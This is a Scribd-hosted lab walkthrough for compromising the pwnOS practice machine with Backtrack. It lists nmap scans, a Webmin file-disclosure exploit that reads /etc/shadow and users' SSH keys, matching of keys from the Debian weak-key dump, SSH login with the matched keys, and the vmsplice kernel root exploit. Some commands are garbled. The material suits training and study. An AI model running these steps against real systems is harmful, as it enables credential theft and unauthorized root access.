Scribd
Upload
362 views2 pages

Hacking pwnOS with Backtrack

The document outlines the steps to hack into a pwnOS system using Backtrack: 1) Identify live systems on the network using nmap scans. 2) Scan identified systems to find open ports and services, discovering ports 10000 and 22 are open. 3) Exploit vulnerabilities in Webmin and OpenSSL, like arbitrary file disclosure, to extract user passwords and SSH keys. 4) Use SSH keys to authenticate as users and escalate privileges by exploiting a Linux kernel vulnerability.

Uploaded by

cycops
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
362 views2 pages

Hacking pwnOS with Backtrack

The document outlines the steps to hack into a pwnOS system using Backtrack: 1) Identify live systems on the network using nmap scans. 2) Scan identified systems to find open ports and services, discovering ports 10000 and 22 are open. 3) Exploit vulnerabilities in Webmin and OpenSSL, like arbitrary file disclosure, to extract user passwords and SSH keys. 4) Use SSH keys to authenticate as users and escalate privileges by exploiting a Linux kernel vulnerability.

Uploaded by

cycops
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

Hacking pwnOS system using Backtrack

Stage 1: Foot Printing (Identifying Live system) nmap [Link]-255 Stage 2: Scanning / Banner Grabbing (Service & Version Identification) nmap -sV -sS -O [Link] As we are able to see port 10000 (Webmin) and 22 (Debian OpenSSH / OpenSSL) ports are listening, we will be searching for vulnerabilities related to the same. Browse [Link] and search for Webmin and OpenSSL. Stage 3: Gaining Access Download Webmin exploit code (Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl)) from the following link [Link] and make it an executable file. Execute the Webmin exploit using the following syntax perl [Link] [Link] 10000 /etc/shadow 0 We will be able to observe that the victim system contains users by name vmware, obama, osama and momama. Save the output in a [Link] the authorized keys for vmware, osama, obama and momama users using file disclosure vulnerability. perl [Link] [Link] 10000 /home/vmware/.ssh/authorized_keys perl [Link] [Link] 10000 /home/obama/.ssh/authorized_keys perl [Link] [Link] 10000 /home/osama/.ssh/authorized_keys perl [Link] [Link] 10000 /home/yomama/.ssh/authorized_keys Save the output of these in a file. Make use of OpenSSL vulnerability which can extract RSA keys to exploit. Download RSA 2048 dump from the following link [Link] with the help of wget Wget [Link] Extract the content of tar ball using the following command. tar jxvf debian_ssh_rsa_2048_x86.[Link] cd rsa/2048 Scan for public key by using grep command grep lr AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/ LKs+FLB7zfmy14qQJUrsQsEOo9FNkoilHAgvQuiE5Wy9DwYVfLrkkcDB2uubtMzGw9hl3smD/ OwUyXc/lNED7MNLS8JvehZbMJv1GkkMHvv1Vfcs6FVnBIfPBz0OqFrEGf+a4JEc/ eF2R6nIJDIgnjBVeNcQaIM3NOr1rYPzgDwAH/yWoKfzNv5zeMUkMZ7OVC54AovoSujQC/ VRdKzGRhhLQmyFVMH9v19UrLgJB6otLcr3d8/

uAB2ypTw+LmuIPe9zqrMwxskdfY4Sth2rl6D3bq6Fwca+pYh++phOyKeDPYkBi3hx6R3b3ETZlNCLJjG7+t7kwF dF02Iuw rsa/2048/*.pub grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAxRuWHhMPelB60JctxC6BDxjqQXggf0ptx 2wrcAw09HayPxMnKv+BFiGA/ I1yXn5EqUfuLSDcTwiIeVSvqJl3NNI5HQUUc6KGlwrhCW464ksARX2ZAp9+6Yu7D phKZmtF5QsWaiJc7oV5il89zltwBDqR362AH49m8/3OcZp4XJqEAOlVWeT5/ jikmke834CyTMlIcyPL85LpFw2aXQCJQIzvkCHJAfwTpwJTugGMB5Ng73omS82Q3ErbOhTSa5iBuE86SEkyyot EBUObgWU3QW6ZMWM0Rd9ErIgvps1r/qpteMMrgieSUKlF/LaeMezSXXkZrn0x+A2bKsw9GwMetQ rsa/2048/ *.pub Save the obtained public keys and use them for ssh authorization ssh -i dcbe2a56e8cdea6d17495f6648329ee2-4679 obama@[Link] exit or for vmware user ssh -i d8629ce6dc8f2492e1454c13f46adb26-4566 vmware@[Link] hostname uname a / uname r We will be able to observe that the system is running linux kernel 2.6.17. Search for privilege escalation vulnerability on Linux kernel 2.6.17. Stage 4: Privilege escalation Visit [Link] search for Linux kernel 2.6 and download exploit code (*Linux Kernel 2.6.17 - [Link] vmsplice Local Root Exploit*) from the following link [Link] . Save the file with .c as extension. nano vmsplice.c compile the c program using gcc gcc vmsplice.c -o vmsplice and execute ./vmsplice whoami

#########################################################################################

You might also like